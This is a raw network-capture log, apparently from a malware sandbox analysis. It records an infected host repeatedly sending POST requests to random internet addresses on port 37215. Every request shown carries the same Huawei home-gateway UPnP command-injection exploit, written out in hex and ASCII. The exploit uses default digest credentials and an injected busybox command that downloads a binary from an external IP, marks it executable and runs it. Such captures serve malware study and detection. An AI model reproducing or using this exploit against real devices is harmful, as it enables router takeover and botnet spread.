                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1447192.168.2.155151241.206.199.7137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.471997023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1448192.168.2.1535184190.5.121.24537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472008944 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1449192.168.2.1558680102.66.208.8137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472039938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1450192.168.2.1552122197.255.43.24437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472048998 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1451192.168.2.1533472197.162.227.7337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472080946 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1452192.168.2.1535944190.182.143.11437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472083092 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1453192.168.2.1545300197.119.178.8537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472083092 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1454192.168.2.1536072197.57.187.9337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472100973 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1455192.168.2.1540522156.56.146.16537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472126961 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1456192.168.2.1554934122.150.138.16737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472162962 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1457192.168.2.1536066121.157.64.12937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.472162962 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
